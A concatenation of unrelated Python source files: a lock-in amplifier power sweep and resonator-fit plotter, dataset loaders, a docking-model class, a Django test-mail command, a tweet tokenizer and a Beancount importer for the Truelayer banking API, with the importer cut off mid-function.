from typing import List
import h5py
import numpy as np
from presto.hardware import AdcFSample, AdcMode, DacFSample, DacMode
from presto import lockin
from presto.utils import ProgressBar
from _base import Base
DAC_CURRENT = 32_000 # uA
CONVERTER_CONFIGURATION = {
"adc_mode": AdcMode.Mixed,
"adc_fsample": AdcFSample.G4,
"dac_mode": DacMode.Mixed42,
"dac_fsample": DacFSample.G10,
}
class SweepPower(Base):
def __init__(
self,
freq_center: float,
freq_span: float,
df: float,
num_averages: int,
amp_arr: List[float],
output_port: int,
input_port: int,
dither: bool = True,
num_skip: int = 0,
) -> None:
self.freq_center = freq_center
self.freq_span = freq_span
self.df = df # modified after tuning
self.num_averages = num_averages
self.amp_arr = np.atleast_1d(amp_arr).astype(np.float64)
self.output_port = output_port
self.input_port = input_port
self.dither = dither
self.num_skip = num_skip
self.freq_arr = None # replaced by run
self.resp_arr = None # replaced by run
def run(
self,
presto_address: str,
presto_port: int = None,
ext_ref_clk: bool = False,
) -> str:
with lockin.Lockin(
address=presto_address,
port=presto_port,
ext_ref_clk=ext_ref_clk,
**CONVERTER_CONFIGURATION,
) as lck:
assert lck.hardware is not None
lck.hardware.set_adc_attenuation(self.input_port, 0.0)
lck.hardware.set_dac_current(self.output_port, DAC_CURRENT)
lck.hardware.set_inv_sinc(self.output_port, 0)
nr_amps = len(self.amp_arr)
# tune frequencies
_, self.df = lck.tune(0.0, self.df)
f_start = self.freq_center - self.freq_span / 2
f_stop = self.freq_center + self.freq_span / 2
n_start = int(round(f_start / self.df))
n_stop = int(round(f_stop / self.df))
n_arr = np.arange(n_start, n_stop + 1)
nr_freq = len(n_arr)
self.freq_arr = self.df * n_arr
self.resp_arr = np.zeros((nr_amps, nr_freq), np.complex128)
lck.hardware.configure_mixer(
freq=self.freq_arr[0],
in_ports=self.input_port,
out_ports=self.output_port,
)
lck.set_df(self.df)
og = lck.add_output_group(self.output_port, 1)
og.set_frequencies(0.0)
og.set_amplitudes(self.amp_arr[0])
og.set_phases(0.0, 0.0)
lck.set_dither(self.dither, self.output_port)
ig = lck.add_input_group(self.input_port, 1)
ig.set_frequencies(0.0)
lck.apply_settings()
pb = ProgressBar(nr_amps * nr_freq)
pb.start()
for jj, amp in enumerate(self.amp_arr):
og.set_amplitudes(amp)
lck.apply_settings()
for ii, freq in enumerate(self.freq_arr):
lck.hardware.configure_mixer(
freq=freq,
in_ports=self.input_port,
out_ports=self.output_port,
)
lck.hardware.sleep(1e-3, False)
_d = lck.get_pixels(self.num_skip + self.num_averages, quiet=True)
data_i = _d[self.input_port][1][:, 0]
data_q = _d[self.input_port][2][:, 0]
data = data_i.real + 1j * data_q.real # using zero IF
self.resp_arr[jj, ii] = np.mean(data[-self.num_averages:])
pb.increment()
pb.done()
# Mute outputs at the end of the sweep
og.set_amplitudes(0.0)
lck.apply_settings()
return self.save()
def save(self, save_filename: str = None) -> str:
return super().save(__file__, save_filename=save_filename)
@classmethod
def load(cls, load_filename: str) -> 'SweepPower':
with h5py.File(load_filename, "r") as h5f:
freq_center = h5f.attrs["freq_center"]
freq_span = h5f.attrs["freq_span"]
df = h5f.attrs["df"]
num_averages = h5f.attrs["num_averages"]
output_port = h5f.attrs["output_port"]
input_port = h5f.attrs["input_port"]
dither = h5f.attrs["dither"]
num_skip = h5f.attrs["num_skip"]
amp_arr = h5f["amp_arr"][()]
freq_arr = h5f["freq_arr"][()]
resp_arr = h5f["resp_arr"][()]
self = cls(
freq_center=freq_center,
freq_span=freq_span,
df=df,
num_averages=num_averages,
amp_arr=amp_arr,
output_port=output_port,
input_port=input_port,
dither=dither,
num_skip=num_skip,
)
self.freq_arr = freq_arr
self.resp_arr = resp_arr
return self
def analyze(self, norm: bool = True, portrait: bool = True, blit: bool = False):
if self.freq_arr is None:
raise RuntimeError
if self.resp_arr is None:
raise RuntimeError
import matplotlib.pyplot as plt
try:
from resonator_tools import circuit
import matplotlib.widgets as mwidgets
_do_fit = True
except ImportError:
_do_fit = False
nr_amps = len(self.amp_arr)
self._AMP_IDX = nr_amps // 2
if norm:
resp_scaled = np.zeros_like(self.resp_arr)
for jj in range(nr_amps):
resp_scaled[jj] = self.resp_arr[jj] / self.amp_arr[jj]
else:
resp_scaled = self.resp_arr
resp_dB = 20. * np.log10(np.abs(resp_scaled))
amp_dBFS = 20 * np.log10(self.amp_arr / 1.0)
# choose limits for colorbar
cutoff = 1. # %
lowlim = np.percentile(resp_dB, cutoff)
highlim = np.percentile(resp_dB, 100. - cutoff)
# extent
x_min = 1e-9 * self.freq_arr[0]
x_max = 1e-9 * self.freq_arr[-1]
dx = 1e-9 * (self.freq_arr[1] - self.freq_arr[0])
y_min = amp_dBFS[0]
y_max = amp_dBFS[-1]
dy = amp_dBFS[1] - amp_dBFS[0]
if portrait:
fig1 = plt.figure(tight_layout=True, figsize=(6.4, 9.6))
ax1 = fig1.add_subplot(2, 1, 1)
# fig1 = plt.figure(tight_layout=True)
# ax1 = fig1.add_subplot(1, 1, 1)
else:
fig1 = plt.figure(tight_layout=True, figsize=(12.8, 4.8))
ax1 = fig1.add_subplot(1, 2, 1)
im = ax1.imshow(
resp_dB,
origin='lower',
aspect='auto',
interpolation='none',
extent=(x_min - dx / 2, x_max + dx / 2, y_min - dy / 2, y_max + dy / 2),
vmin=lowlim,
vmax=highlim,
)
line_sel = ax1.axhline(amp_dBFS[self._AMP_IDX], ls="--", c="k", lw=3, animated=blit)
# ax1.set_title(f"amp = {amp_arr[AMP_IDX]:.2e}")
ax1.set_xlabel("Frequency [GHz]")
ax1.set_ylabel("Drive amplitude [dBFS]")
cb = fig1.colorbar(im)
if portrait:
cb.set_label("Response amplitude [dB]")
else:
ax1.set_title("Response amplitude [dB]")
fig1.show()
# return fig1
if portrait:
ax2 = fig1.add_subplot(4, 1, 3)
ax3 = fig1.add_subplot(4, 1, 4, sharex=ax2)
else:
ax2 = fig1.add_subplot(2, 2, 2)
ax3 = fig1.add_subplot(2, 2, 4, sharex=ax2)
ax2.yaxis.set_label_position("right")
ax2.yaxis.tick_right()
ax3.yaxis.set_label_position("right")
ax3.yaxis.tick_right()
line_a, = ax2.plot(1e-9 * self.freq_arr, resp_dB[self._AMP_IDX], label="measured", animated=blit)
line_p, = ax3.plot(1e-9 * self.freq_arr, np.angle(self.resp_arr[self._AMP_IDX]), animated=blit)
if _do_fit:
line_fit_a, = ax2.plot(1e-9 * self.freq_arr,
np.full_like(self.freq_arr, np.nan),
ls="--",
label="fit",
animated=blit)
line_fit_p, = ax3.plot(1e-9 * self.freq_arr, np.full_like(self.freq_arr, np.nan), ls="--", animated=blit)
f_min = 1e-9 * self.freq_arr.min()
f_max = 1e-9 * self.freq_arr.max()
f_rng = f_max - f_min
a_min = resp_dB.min()
a_max = resp_dB.max()
a_rng = a_max - a_min
p_min = -np.pi
p_max = np.pi
p_rng = p_max - p_min
ax2.set_xlim(f_min - 0.05 * f_rng, f_max + 0.05 * f_rng)
ax2.set_ylim(a_min - 0.05 * a_rng, a_max + 0.05 * a_rng)
ax3.set_xlim(f_min - 0.05 * f_rng, f_max + 0.05 * f_rng)
ax3.set_ylim(p_min - 0.05 * p_rng, p_max + 0.05 * p_rng)
ax3.set_xlabel("Frequency [GHz]")
ax2.set_ylabel("Response amplitude [dB]")
ax3.set_ylabel("Response phase [rad]")
ax2.legend(loc="lower right")
def onbuttonpress(event):
if event.inaxes == ax1:
self._AMP_IDX = np.argmin(np.abs(amp_dBFS - event.ydata))
update()
def onkeypress(event):
if event.inaxes == ax1:
if event.key == "up":
self._AMP_IDX += 1
if self._AMP_IDX >= len(amp_dBFS):
self._AMP_IDX = len(amp_dBFS) - 1
update()
elif event.key == "down":
self._AMP_IDX -= 1
if self._AMP_IDX < 0:
self._AMP_IDX = 0
update()
def update():
line_sel.set_ydata([amp_dBFS[self._AMP_IDX], amp_dBFS[self._AMP_IDX]])
# ax1.set_title(f"amp = {amp_arr[AMP_IDX]:.2e}")
print(
f"drive amp {self._AMP_IDX:d}: {self.amp_arr[self._AMP_IDX]:.2e} FS = {amp_dBFS[self._AMP_IDX]:.1f} dBFS"
)
line_a.set_ydata(resp_dB[self._AMP_IDX])
line_p.set_ydata(np.angle(self.resp_arr[self._AMP_IDX]))
if _do_fit:
line_fit_a.set_ydata(np.full_like(self.freq_arr, np.nan))
line_fit_p.set_ydata(np.full_like(self.freq_arr, np.nan))
# ax2.set_title("")
if blit:
fig1.canvas.restore_region(self._bg)
ax1.draw_artist(line_sel)
ax2.draw_artist(line_a)
ax3.draw_artist(line_p)
fig1.canvas.blit(fig1.bbox)
fig1.canvas.flush_events()
else:
fig1.canvas.draw()
if _do_fit:
def onselect(xmin, xmax):
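                # fit a notch-port resonator model to the selected frequency span and overlay the fitted curves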
port = circuit.notch_port(self.freq_arr, self.resp_arr[self._AMP_IDX])
port.autofit(fcrop=(xmin * 1e9, xmax * 1e9))
if norm:
line_fit_a.set_data(1e-9 * port.f_data,
20 * np.log10(np.abs(port.z_data_sim / self.amp_arr[self._AMP_IDX])))
else:
line_fit_a.set_data(1e-9 * port.f_data, 20 * np.log10(np.abs(port.z_data_sim)))
line_fit_p.set_data(1e-9 * port.f_data, np.angle(port.z_data_sim))
# print(port.fitresults)
print("----------------")
print(f"fr = {port.fitresults['fr']}")
print(f"Qi = {port.fitresults['Qi_dia_corr']}")
print(f"Qc = {port.fitresults['Qc_dia_corr']}")
print(f"Ql = {port.fitresults['Ql']}")
print(f"kappa = {port.fitresults['fr'] / port.fitresults['Qc_dia_corr']}")
print("----------------")
# ax2.set_title(
# f"fr = {1e-6*fr:.0f} MHz, Ql = {Ql:.0f}, Qi = {Qi:.0f}, Qc = {Qc:.0f}, kappa = {1e-3*kappa:.0f} kHz")
if blit:
fig1.canvas.restore_region(self._bg)
ax1.draw_artist(line_sel)
ax2.draw_artist(line_a)
ax2.draw_artist(line_fit_a)
ax3.draw_artist(line_p)
ax3.draw_artist(line_fit_p)
fig1.canvas.blit(fig1.bbox)
fig1.canvas.flush_events()
else:
fig1.canvas.draw()
rectprops = dict(facecolor='tab:gray', alpha=0.5)
fig1._span_a = mwidgets.SpanSelector(ax2, onselect, 'horizontal', rectprops=rectprops, useblit=blit)
fig1._span_p = mwidgets.SpanSelector(ax3, onselect, 'horizontal', rectprops=rectprops, useblit=blit)
fig1.canvas.mpl_connect('button_press_event', onbuttonpress)
fig1.canvas.mpl_connect('key_press_event', onkeypress)
fig1.show()
if blit:
fig1.canvas.draw()
fig1.canvas.flush_events()
self._bg = fig1.canvas.copy_from_bbox(fig1.bbox)
ax1.draw_artist(line_sel)
ax2.draw_artist(line_a)
ax3.draw_artist(line_p)
fig1.canvas.blit(fig1.bbox)
return fig1
|
[
"h5py.File",
"numpy.zeros_like",
"numpy.atleast_1d",
"presto.utils.ProgressBar",
"numpy.abs",
"numpy.full_like",
"numpy.angle",
"numpy.zeros",
"presto.lockin.Lockin",
"numpy.percentile",
"matplotlib.pyplot.figure",
"numpy.mean",
"numpy.arange",
"matplotlib.widgets.SpanSelector",
"numpy.log10",
"resonator_tools.circuit.notch_port"
] |
[((6151, 6181), 'numpy.percentile', 'np.percentile', (['resp_dB', 'cutoff'], {}), '(resp_dB, cutoff)\n', (6164, 6181), True, 'import numpy as np\n'), ((6200, 6238), 'numpy.percentile', 'np.percentile', (['resp_dB', '(100.0 - cutoff)'], {}), '(resp_dB, 100.0 - cutoff)\n', (6213, 6238), True, 'import numpy as np\n'), ((1413, 1525), 'presto.lockin.Lockin', 'lockin.Lockin', ([], {'address': 'presto_address', 'port': 'presto_port', 'ext_ref_clk': 'ext_ref_clk'}), '(address=presto_address, port=presto_port, ext_ref_clk=\n ext_ref_clk, **CONVERTER_CONFIGURATION)\n', (1426, 1525), False, 'from presto import lockin\n'), ((2209, 2239), 'numpy.arange', 'np.arange', (['n_start', '(n_stop + 1)'], {}), '(n_start, n_stop + 1)\n', (2218, 2239), True, 'import numpy as np\n'), ((2345, 2388), 'numpy.zeros', 'np.zeros', (['(nr_amps, nr_freq)', 'np.complex128'], {}), '((nr_amps, nr_freq), np.complex128)\n', (2353, 2388), True, 'import numpy as np\n'), ((2985, 3015), 'presto.utils.ProgressBar', 'ProgressBar', (['(nr_amps * nr_freq)'], {}), '(nr_amps * nr_freq)\n', (2996, 3015), False, 'from presto.utils import ProgressBar\n'), ((4261, 4290), 'h5py.File', 'h5py.File', (['load_filename', '"""r"""'], {}), "(load_filename, 'r')\n", (4270, 4290), False, 'import h5py\n'), ((5771, 5799), 'numpy.zeros_like', 'np.zeros_like', (['self.resp_arr'], {}), '(self.resp_arr)\n', (5784, 5799), True, 'import numpy as np\n'), ((6042, 6070), 'numpy.log10', 'np.log10', (['(self.amp_arr / 1.0)'], {}), '(self.amp_arr / 1.0)\n', (6050, 6070), True, 'import numpy as np\n'), ((6532, 6581), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'tight_layout': '(True)', 'figsize': '(6.4, 9.6)'}), '(tight_layout=True, figsize=(6.4, 9.6))\n', (6542, 6581), True, 'import matplotlib.pyplot as plt\n'), ((6756, 6806), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'tight_layout': '(True)', 'figsize': '(12.8, 4.8)'}), '(tight_layout=True, figsize=(12.8, 4.8))\n', (6766, 6806), True, 'import matplotlib.pyplot as plt\n'), ((8148, 8186), 'numpy.angle', 'np.angle', (['self.resp_arr[self._AMP_IDX]'], {}), '(self.resp_arr[self._AMP_IDX])\n', (8156, 8186), True, 'import numpy as np\n'), ((12745, 12834), 'matplotlib.widgets.SpanSelector', 'mwidgets.SpanSelector', (['ax2', 'onselect', '"""horizontal"""'], {'rectprops': 'rectprops', 'useblit': 'blit'}), "(ax2, onselect, 'horizontal', rectprops=rectprops,\n useblit=blit)\n", (12766, 12834), True, 'import matplotlib.widgets as mwidgets\n'), ((12858, 12947), 'matplotlib.widgets.SpanSelector', 'mwidgets.SpanSelector', (['ax3', 'onselect', '"""horizontal"""'], {'rectprops': 'rectprops', 'useblit': 'blit'}), "(ax3, onselect, 'horizontal', rectprops=rectprops,\n useblit=blit)\n", (12879, 12947), True, 'import matplotlib.widgets as mwidgets\n'), ((984, 1006), 'numpy.atleast_1d', 'np.atleast_1d', (['amp_arr'], {}), '(amp_arr)\n', (997, 1006), True, 'import numpy as np\n'), ((5997, 6016), 'numpy.abs', 'np.abs', (['resp_scaled'], {}), '(resp_scaled)\n', (6003, 6016), True, 'import numpy as np\n'), ((8315, 8350), 'numpy.full_like', 'np.full_like', (['self.freq_arr', 'np.nan'], {}), '(self.freq_arr, np.nan)\n', (8327, 8350), True, 'import numpy as np\n'), ((8551, 8586), 'numpy.full_like', 'np.full_like', (['self.freq_arr', 'np.nan'], {}), '(self.freq_arr, np.nan)\n', (8563, 8586), True, 'import numpy as np\n'), ((10388, 10426), 'numpy.angle', 'np.angle', (['self.resp_arr[self._AMP_IDX]'], {}), '(self.resp_arr[self._AMP_IDX])\n', (10396, 10426), True, 'import numpy as np\n'), ((11051, 11114), 
'resonator_tools.circuit.notch_port', 'circuit.notch_port', (['self.freq_arr', 'self.resp_arr[self._AMP_IDX]'], {}), '(self.freq_arr, self.resp_arr[self._AMP_IDX])\n', (11069, 11114), False, 'from resonator_tools import circuit\n'), ((3811, 3845), 'numpy.mean', 'np.mean', (['data[-self.num_averages:]'], {}), '(data[-self.num_averages:])\n', (3818, 3845), True, 'import numpy as np\n'), ((9446, 9476), 'numpy.abs', 'np.abs', (['(amp_dBFS - event.ydata)'], {}), '(amp_dBFS - event.ydata)\n', (9452, 9476), True, 'import numpy as np\n'), ((10489, 10524), 'numpy.full_like', 'np.full_like', (['self.freq_arr', 'np.nan'], {}), '(self.freq_arr, np.nan)\n', (10501, 10524), True, 'import numpy as np\n'), ((10563, 10598), 'numpy.full_like', 'np.full_like', (['self.freq_arr', 'np.nan'], {}), '(self.freq_arr, np.nan)\n', (10575, 10598), True, 'import numpy as np\n'), ((11549, 11574), 'numpy.angle', 'np.angle', (['port.z_data_sim'], {}), '(port.z_data_sim)\n', (11557, 11574), True, 'import numpy as np\n'), ((11315, 11368), 'numpy.abs', 'np.abs', (['(port.z_data_sim / self.amp_arr[self._AMP_IDX])'], {}), '(port.z_data_sim / self.amp_arr[self._AMP_IDX])\n', (11321, 11368), True, 'import numpy as np\n'), ((11467, 11490), 'numpy.abs', 'np.abs', (['port.z_data_sim'], {}), '(port.z_data_sim)\n', (11473, 11490), True, 'import numpy as np\n')]
|
# Lint as: python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Provides access to the Smart Buidlings dataset for Anomaly Detection."""
from madi.datasets.base_dataset import BaseDataset
import numpy as np
import pandas as pd
import tensorflow as tf
_DATA_FILE = "madi/datasets/data/anomaly_detection_sample_1577622599.csv"
_README_FILE = "madi/datasets/data/anomaly_detection_sample_1577622599_README.md"
class SmartBuildingsDataset(BaseDataset):
"""Smart Buildings data set for Multivariate Anomaly Detection."""
def __init__(self,
datafilepath: str = _DATA_FILE,
readmefilepath: str = _README_FILE):
self._sample = self._load_data_file(datafilepath)
self._description = self._load_readme(readmefilepath)
@property
def sample(self) -> pd.DataFrame:
return self._sample
@property
def name(self) -> str:
return "smart_buildings"
@property
def description(self) -> str:
return self._description
def _load_data_file(self, datafile: str) -> pd.DataFrame:
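    # read the CSV sample from the data file and return it with its rows randomly permuted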
sample = None
if not tf.io.gfile.exists(datafile):
raise AssertionError("{} does not exist".format(datafile))
with tf.io.gfile.GFile(datafile) as csv_file:
sample = pd.read_csv(csv_file, header="infer", index_col=0)
sample = sample.reindex(np.random.permutation(sample.index))
return sample
|
[
"pandas.read_csv",
"numpy.random.permutation",
"tensorflow.io.gfile.exists",
"tensorflow.io.gfile.GFile"
] |
[((1632, 1660), 'tensorflow.io.gfile.exists', 'tf.io.gfile.exists', (['datafile'], {}), '(datafile)\n', (1650, 1660), True, 'import tensorflow as tf\n'), ((1736, 1763), 'tensorflow.io.gfile.GFile', 'tf.io.gfile.GFile', (['datafile'], {}), '(datafile)\n', (1753, 1763), True, 'import tensorflow as tf\n'), ((1792, 1842), 'pandas.read_csv', 'pd.read_csv', (['csv_file'], {'header': '"""infer"""', 'index_col': '(0)'}), "(csv_file, header='infer', index_col=0)\n", (1803, 1842), True, 'import pandas as pd\n'), ((1872, 1907), 'numpy.random.permutation', 'np.random.permutation', (['sample.index'], {}), '(sample.index)\n', (1893, 1907), True, 'import numpy as np\n')]
|
from datetime import date, datetime
dados = dict()
dados['nome'] = str(input('Name: '))
nasc = int(input('YEAR OF BIRTH: '))
dados['idade'] = datetime.now().year - nasc
dados['ctps'] = int(input('work card number (0 if none): '))
if dados['ctps'] != 0:
    dados['contratação'] = int(input('year of hiring: '))
    dados['salário'] = float(input('salary: R$'))
    dados['aposentadoria'] = (dados['contratação'] + 35) - datetime.now().year
for v, r in dados.items():
    print(f'- {v} is equal to {r}')
|
[
"datetime.datetime.now"
] |
[((146, 160), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (158, 160), False, 'from datetime import date, datetime\n'), ((435, 449), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (447, 449), False, 'from datetime import date, datetime\n')]
|
import torch
from torch.utils.data import Dataset
import numpy as np
from scipy.io import loadmat
class NatPatchDataset(Dataset):
def __init__(self, N:int, width:int, height:int, border:int=4, fpath:str='../../data/IMAGES.mat', test=False):
super(NatPatchDataset, self).__init__()
self.N = N
self.width = width
self.height = height
self.border = border
self.fpath = fpath
self.test = test
# holder
self.images = None
# initialize patches
self.extract_patches_()
def __len__(self):
return self.images.shape[0]
def __getitem__(self, idx):
return self.images[idx]
def extract_patches_(self):
# load mat
X = loadmat(self.fpath)
X = X['IMAGES']
img_size = X.shape[0]
n_img = X.shape[2]
self.images = torch.zeros((self.N * n_img, self.width, self.height))
# for every image
counter = 0
# Save the last image for testing
if self.test:
image_indices = [-1]
else:
image_indices = range(n_img)[:-1]
for i in image_indices:
img = X[:, :, i]
for j in range(self.N):
if self.test: # use a deterministic patch for producing figures
x = 63
y = 14
else:
x = np.random.randint(self.border, img_size - self.width - self.border)
y = np.random.randint(self.border, img_size - self.height - self.border)
crop = torch.tensor(img[x:x+self.width, y:y+self.height])
self.images[counter, :, :] = crop - crop.mean()
counter += 1
|
[
"torch.zeros",
"numpy.random.randint",
"torch.tensor",
"scipy.io.loadmat"
] |
[((746, 765), 'scipy.io.loadmat', 'loadmat', (['self.fpath'], {}), '(self.fpath)\n', (753, 765), False, 'from scipy.io import loadmat\n'), ((869, 923), 'torch.zeros', 'torch.zeros', (['(self.N * n_img, self.width, self.height)'], {}), '((self.N * n_img, self.width, self.height))\n', (880, 923), False, 'import torch\n'), ((1589, 1643), 'torch.tensor', 'torch.tensor', (['img[x:x + self.width, y:y + self.height]'], {}), '(img[x:x + self.width, y:y + self.height])\n', (1601, 1643), False, 'import torch\n'), ((1405, 1472), 'numpy.random.randint', 'np.random.randint', (['self.border', '(img_size - self.width - self.border)'], {}), '(self.border, img_size - self.width - self.border)\n', (1422, 1472), True, 'import numpy as np\n'), ((1497, 1565), 'numpy.random.randint', 'np.random.randint', (['self.border', '(img_size - self.height - self.border)'], {}), '(self.border, img_size - self.height - self.border)\n', (1514, 1565), True, 'import numpy as np\n')]
|
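# --- Illustrative usage sketch for the NatPatchDataset above (not part of the original
# record). The patch count, patch size, and .mat path below are assumptions chosen only
# to show how such a dataset is typically consumed with a PyTorch DataLoader.
from torch.utils.data import DataLoader

patches = NatPatchDataset(N=200, width=10, height=10, fpath='../../data/IMAGES.mat')
loader = DataLoader(patches, batch_size=64, shuffle=True)

for batch in loader:
    # each batch is a float tensor of shape (batch_size, width, height);
    # flatten it before feeding a sparse-coding / dictionary-learning model
    flat = batch.reshape(batch.shape[0], -1)
    break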
import ihm.model
import logging
dockinglog = logging.getLogger("log")
class DockingModel(ihm.model.Model):
"""Subclass to save memory."""
# ======================================================================
# IMPORTANT #
# To add the atoms, the class module needs a list containing the following:
# [(<ihm.AsymUnit object...108edf5b0>, 1, 'C', 'CA', 1.0, 2.0, 3.0), ...]
# Which means that the AsymUnit object will be copied many times and this
# will eat a lot of memory.
# To avoid this we subclass IHM Model class and override get_atoms function
# ======================================================================
def __init__(self, assymetric_dic, atom_list, *args, **kwargs):
super().__init__(*args, **kwargs)
self.asym_unit_map = assymetric_dic
self.atom_list = atom_list
def get_atoms(self):
for asym, seq_id, type_symbol, atom_id, x, y, z in self.atom_list:
yield ihm.model.Atom(
asym_unit=self.asym_unit_map[asym],
type_symbol=type_symbol,
seq_id=seq_id,
atom_id=atom_id,
x=x,
y=y,
z=z,
)
|
[
"logging.getLogger"
] |
[((46, 70), 'logging.getLogger', 'logging.getLogger', (['"""log"""'], {}), "('log')\n", (63, 70), False, 'import logging\n')]
|
from django.core.management.base import BaseCommand
from mainapp.functions.mail import send_mail
from mainapp.models import UserProfile
class Command(BaseCommand):
help = "Sends a test e-mail to check if the mail-system is configured correctly"
def add_arguments(self, parser):
parser.add_argument("to-email", type=str)
def handle(self, *args, **options):
body_text = "The test e-mail has arrived 🎉"
body_html = "<h1>The test e-mail has arrived 🎉</h1>"
to_email = options["to-email"]
profile = UserProfile.objects.filter(user__email=to_email).first()
send_mail(to_email, "Hello 🌏", body_text, body_html, profile)
|
[
"mainapp.models.UserProfile.objects.filter",
"mainapp.functions.mail.send_mail"
] |
[((618, 679), 'mainapp.functions.mail.send_mail', 'send_mail', (['to_email', '"""Hello 🌏"""', 'body_text', 'body_html', 'profile'], {}), "(to_email, 'Hello 🌏', body_text, body_html, profile)\n", (627, 679), False, 'from mainapp.functions.mail import send_mail\n'), ((552, 600), 'mainapp.models.UserProfile.objects.filter', 'UserProfile.objects.filter', ([], {'user__email': 'to_email'}), '(user__email=to_email)\n', (578, 600), False, 'from mainapp.models import UserProfile\n')]
|
# Copyright 2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from packaging.version import parse
try:
import tensorflow as tf
except:
raise ImportWarning(
"It seems like the Tensorflow package is not installed\n"
"Please run"
"`$ pip install tensorflow`. \n",
)
def check_tf_version():
if parse(tf.__version__) < parse("2.0.0"):
raise ImportError(
"The Tensorflow package version needs to be at least 2.0.0 \n"
"for keras-ncp to run. Currently, your TensorFlow version is \n"
"{version}. Please upgrade with \n"
"`$ pip install --upgrade tensorflow`. \n"
"You can use `pip freeze` to check afterwards that everything is "
"ok.".format(version=tf.__version__)
)
|
[
"packaging.version.parse"
] |
[((843, 864), 'packaging.version.parse', 'parse', (['tf.__version__'], {}), '(tf.__version__)\n', (848, 864), False, 'from packaging.version import parse\n'), ((867, 881), 'packaging.version.parse', 'parse', (['"""2.0.0"""'], {}), "('2.0.0')\n", (872, 881), False, 'from packaging.version import parse\n')]
|
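# --- Side note (sketch, not part of the original module): packaging.version.parse is
# used above because version strings must be compared component-wise, not
# lexicographically. The version numbers below are arbitrary examples.
from packaging.version import parse

assert parse("2.10.0") > parse("2.9.1")   # numeric, component-wise comparison
assert not ("2.10.0" > "2.9.1")           # plain string comparison gets this wrong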
import string
from nltk.tokenize.casual import TweetTokenizer
def tokenize(text):
tweet_tokenizer = TweetTokenizer()
# 1. Tokenize
text = tweet_tokenizer.tokenize(text)
# 2. Cleaning
# Punctuation
text = [t for t in text if t not in string.punctuation]
# Normalisieren
text = [t.lower() for t in text]
return text
|
[
"nltk.tokenize.casual.TweetTokenizer"
] |
[((105, 121), 'nltk.tokenize.casual.TweetTokenizer', 'TweetTokenizer', ([], {}), '()\n', (119, 121), False, 'from nltk.tokenize.casual import TweetTokenizer\n')]
|
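# --- Minimal usage sketch for tokenize() above; the sample sentence is an assumption.
# TweetTokenizer keeps hashtags and emoticons intact, then punctuation tokens are
# dropped and everything is lowercased.
if __name__ == "__main__":
    print(tokenize("Great talk about #NLP today!"))
    # expected: ['great', 'talk', 'about', '#nlp', 'today']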
import subprocess
proc = subprocess.Popen(["cargo", "clippy"], stderr=subprocess.PIPE)
output = proc.stderr.read().decode("utf-8")
groups = [group for group in output.split("\n\n") if "parser.rs" not in group]
print("\n-----------------\n".join(groups[:20]))
|
[
"subprocess.Popen"
] |
[((26, 87), 'subprocess.Popen', 'subprocess.Popen', (["['cargo', 'clippy']"], {'stderr': 'subprocess.PIPE'}), "(['cargo', 'clippy'], stderr=subprocess.PIPE)\n", (42, 87), False, 'import subprocess\n')]
|
import logging
from datetime import timedelta
from os import path
import dateutil.parser
import requests
import yaml
from beancount.core import amount, data
from beancount.core.number import D
from beancount.ingest import importer
class Importer(importer.ImporterProtocol):
"""An importer for Truelayer API (e.g. for Revolut)."""
def __init__(self):
self.config = None
self.baseAccount = None
self.clientId = None
self.clientSecret = None
self.refreshToken = None
self.sandbox = None
self.existing_entries = None
self.domain = "truelayer.com"
def _configure(self, file, existing_entries):
with open(file.name, "r") as f:
self.config = yaml.safe_load(f)
self.baseAccount = self.config["baseAccount"]
self.clientId = self.config["client_id"]
self.clientSecret = self.config["client_secret"]
self.refreshToken = self.config["refresh_token"]
self.sandbox = self.clientId.startswith("sandbox")
self.existing_entries = existing_entries
if self.sandbox:
self.domain = "truelayer-sandbox.com"
def identify(self, file):
return "truelayer.yaml" == path.basename(file.name)
def file_account(self, file):
return ""
def extract(self, file, existing_entries=None):
self._configure(file, existing_entries)
r = requests.post(
f"https://auth.{self.domain}/connect/token",
data={
"grant_type": "refresh_token",
"client_id": self.clientId,
"client_secret": self.clientSecret,
"refresh_token": self.refreshToken,
},
)
tokens = r.json()
accessToken = tokens["access_token"]
headers = {"Authorization": "Bearer " + accessToken}
entries = []
entries.extend(self._extract_endpoint_transactions("accounts", headers))
entries.extend(
self._extract_endpoint_transactions("cards", headers, invert_sign=True)
)
return entries
def _extract_endpoint_transactions(self, endpoint, headers, invert_sign=False):
entries = []
r = requests.get(
f"https://api.{self.domain}/data/v1/{endpoint}", headers=headers
)
if not r:
try:
r.raise_for_status()
except requests.HTTPError as e:
logging.warning(e)
return []
for account in r.json()["results"]:
accountId = account["account_id"]
accountCcy = account["currency"]
r = requests.get(
f"https://api.{self.domain}/data/v1/{endpoint}/{accountId}/transactions",
headers=headers,
)
transactions = sorted(r.json()["results"], key=lambda trx: trx["timestamp"])
for trx in transactions:
entries.extend(
self._extract_transaction(
trx, accountCcy, transactions, invert_sign
)
)
return entries
def _extract_transaction(self, trx, accountCcy, transactions, invert_sign):
entries = []
metakv = {}
# sandbox Mock bank doesn't have a provider_id
if "meta" in trx and "provider_id" in trx["meta"]:
metakv["tlref"] = trx["meta"]["provider_id"]
if trx["transaction_classification"]:
metakv["category"] = trx["transaction_classification"][0]
meta = data.new_metadata("", 0, metakv)
trxDate = dateutil.parser.parse(trx["timestamp"]).date()
account = self.baseAccount + accountCcy
tx_amount = D(str(trx["amount"]))
# avoid pylint invalid-unary-operand-type
signed_amount = -1 * tx_amount if invert_sign else tx_amount
entry = data.Transaction(
meta,
trxDate,
"*",
"",
trx["description"],
data.EMPTY_SET,
data.EMPTY_SET,
[
data.Posting(
account,
amount.Amount(signed_amount, trx["currency"]),
None,
None,
None,
None,
),
],
)
